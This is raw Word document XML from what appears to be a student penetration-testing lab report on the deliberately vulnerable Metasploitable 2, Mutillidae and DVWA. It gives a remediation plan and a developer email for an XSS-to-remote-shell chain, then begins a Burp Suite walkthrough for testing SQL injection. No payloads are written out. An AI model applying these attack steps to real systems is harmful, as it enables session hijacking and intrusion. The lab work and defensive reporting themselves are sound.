          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11CC311C" wp14:editId="496E3333">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2028825" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45970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04511" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2028825" cy="1181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7692652E" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="184BEF55" w14:textId="77777777" w:rsidR="00865CCC" w:rsidRDefault="00865CCC" w:rsidP="00634134"/>
    <w:p w14:paraId="2DADCFDF" w14:textId="77777777" w:rsidR="00865CCC" w:rsidRDefault="00865CCC" w:rsidP="00634134"/>
    <w:p w14:paraId="76119DE3" w14:textId="77777777" w:rsidR="00865CCC" w:rsidRPr="00523986" w:rsidRDefault="00865CCC" w:rsidP="00634134"/>
    <w:p w14:paraId="694081E8" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="6AC48635" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="105D92CC" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="24FC4F9D" w14:textId="77777777" w:rsidR="00D73D0A" w:rsidRPr="00D73D0A" w:rsidRDefault="00634134" w:rsidP="00D73D0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc224128475"/>
      <w:r w:rsidRPr="00D73D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="70D55307" w14:textId="3DF190BF" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">A Cross-Site Scripting vulnerability in OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">, which let attackers insert malicious scripts and steal session cookies, was the starting point of the chained attack against Metasploitable 2. Organizations should use stringent input validation and output encoding to prevent XSS in order to lessen this. To safeguard session data, secure cookie properties like SameSite, Secure, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> should be enabled. Firewall rules should limit unused ports, and vulnerable services exploited by Metasploit Framework must be patched or disabled. Early attack detection and prevention are aided by the deployment of a Web Application Firewall and routine vulnerability checks using programs like OpenVAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DF3937" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="08A2CE9F" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="68DD62DB" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="10265523" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="299CD092" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7FFA34FF" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="3CD0112C" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="152FAC9D" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="127FED5F" w14:textId="77777777" w:rsidR="00AE0E95" w:rsidRDefault="00AE0E95" w:rsidP="00634134"/>
    <w:p w14:paraId="3EEB2311" w14:textId="77777777" w:rsidR="00AE0E95" w:rsidRDefault="00AE0E95" w:rsidP="00634134"/>
    <w:p w14:paraId="52B5515A" w14:textId="77777777" w:rsidR="00AE0E95" w:rsidRDefault="00AE0E95" w:rsidP="00634134"/>
    <w:p w14:paraId="1A271EDB" w14:textId="77777777" w:rsidR="00AE0E95" w:rsidRDefault="00AE0E95" w:rsidP="00634134"/>
    <w:p w14:paraId="0A5FB0DB" w14:textId="77777777" w:rsidR="00AE0E95" w:rsidRDefault="00AE0E95" w:rsidP="00634134"/>
    <w:p w14:paraId="159E1135" w14:textId="77777777" w:rsidR="00DE0C36" w:rsidRPr="00817C08" w:rsidRDefault="00634134" w:rsidP="00817C08">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc224128476"/>
      <w:r w:rsidRPr="00817C08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>100-word email to developers with exploit details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5E88CF02" w14:textId="77777777" w:rsidR="00DE0C36" w:rsidRDefault="00DE0C36" w:rsidP="00634134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF2D308" w14:textId="6C06DE3E" w:rsidR="00634134" w:rsidRPr="00DE0C36" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00523986">
        <w:t>XSS to Remote Code Execution Chain Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F62865" w14:textId="77777777" w:rsidR="00DE0C36" w:rsidRPr="00523986" w:rsidRDefault="00DE0C36" w:rsidP="00634134"/>
    <w:p w14:paraId="6496A9DB" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:t>Dear Development Team,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FF14A3" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">During a recent security assessment of the web application hosted on Metasploitable2, we identified a chained vulnerability that could lead to remote code execution. The attack begins with a Cross-Site Scripting (XSS) flaw in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> application, where unsanitized user input allows malicious JavaScript injection. This vulnerability enables attackers to steal session cookies and hijack authenticated sessions. After gaining access, an attacker can enumerate exposed services and exploit vulnerable components using Metasploit to obtain a remote shell on the server. We recommend implementing input validation, output encoding, secure cookie attributes, and disabling unnecessary services immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E159DFD" w14:textId="77777777" w:rsidR="00DE0C36" w:rsidRPr="00523986" w:rsidRDefault="00DE0C36" w:rsidP="00634134"/>
    <w:p w14:paraId="0EC75363" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:t>Kind regards,</w:t>
      </w:r>
      <w:r w:rsidRPr="00523986">
        <w:br/>
        <w:t>Security Assessment Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD6A9DA" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="393ED31B" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542809C8" w14:textId="24A5CD79" w:rsidR="00674841" w:rsidRDefault="00674841" w:rsidP="00674841"/>
    <w:p w14:paraId="6F6AAA09" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="1E8DDC92" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="79390E4C" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="50DED21B" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="1F946CDE" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="43F5BD79" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="5B7F0864" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="2EC71BB7" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="4FB56FBB" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="637C07FD" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="6DE4D8BA" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="6D1DE5DE" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="6D9BF79E" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="676A8850" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="77616EEB" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="5EC87AAF" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="3A1B93DA" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="622D01D7" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="3B11B59A" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="495BB8CC" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="03DCD125" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="20BACA30" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="370BF9A9" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="781A3243" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="4B66F90F" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="761DE8EC" w14:textId="77777777" w:rsidR="00DA4D9A" w:rsidRDefault="00DA4D9A" w:rsidP="00674841"/>
    <w:p w14:paraId="13289BCD" w14:textId="12B5DAC9" w:rsidR="00DA4D9A" w:rsidRDefault="00985C64" w:rsidP="00985C64">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc224128477"/>
      <w:r w:rsidRPr="00985C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test DVWA VM for OWASP Top 10 issues</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5EB129D4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="00105C14" w:rsidRDefault="003D20B9" w:rsidP="00105C14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc224128478"/>
      <w:r w:rsidRPr="00105C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing for SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4D9E9A2F" w14:textId="378398FA" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32E56767" wp14:editId="1817213E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>566999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5440908" cy="2708247"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="16510"/>
            <wp:wrapNone/>
            <wp:docPr id="97144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7092" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5440908" cy="270824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0E6F01">
        <w:t xml:space="preserve">Make sure the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E6F01">
        <w:t>FoxyProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E6F01">
        <w:t xml:space="preserve"> is enabled. In Burpsuite turn intercept on. Capture the below request by entering User ID as 1 and clicking ‘Submit’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588DD3B1" w14:textId="22B5E7A0" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="53FF063D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="799F434C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6DE5C573" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="22D4BCF2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5661669B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="71AA2837" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="27D5B301" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="46F922E9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="18DCC5FF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0B63FE92" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5DE1D4EF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="550B1194" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4B895FF2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4C40EBEE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="71A7D6A2" w14:textId="2A634CCC" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4EE20880" w14:textId="66994FE2" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="000B5720" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53D4D437" wp14:editId="1AC02AF2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>267335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5443497" cy="3084648"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="20955"/>
            <wp:wrapNone/>
            <wp:docPr id="84142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20349" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5443497" cy="308464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3D20B9" w:rsidRPr="000E6F01">
        <w:t>The request has been captured in Burpsuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CF5E2" w14:textId="0015FD0B" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7F21C1B4" w14:textId="7A35A837" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4D111817" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="23D61462" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="66D8A7E6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="20AE1A84" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="523C0C60" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="64B39138" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="57D70315" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6E9E327D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="605EBB05" w14:textId="77777777" w:rsidR="000B5720" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1361C506" w14:textId="77777777" w:rsidR="000B5720" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="58683984" w14:textId="77777777" w:rsidR="000B5720" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="335C3E52" w14:textId="77777777" w:rsidR="000B5720" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5CA00330" w14:textId="77777777" w:rsidR="000B5720" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="03BE10C3" w14:textId="77777777" w:rsidR="000B5720" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="39D9C555" w14:textId="77777777" w:rsidR="000B5720" w:rsidRPr="000E6F01" w:rsidRDefault="000B5720" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4603DAE6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1CF17C34" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="773697C7" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="046992AD" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0830539B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="349B7968" wp14:editId="4B8D5C14">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>321201</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5252665" cy="3941182"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="21590"/>
            <wp:wrapNone/>
            <wp:docPr id="136399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97325" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5256823" cy="394430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0E6F01">
        <w:t>Saved the captured request to file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41041862" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="55282E7C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="018C1E72" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7778B541" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6CCE8782" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4A316636" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="642AF351" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5EC55220" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="52EC7E73" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="55BBE009" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="238EA671" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3294097B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
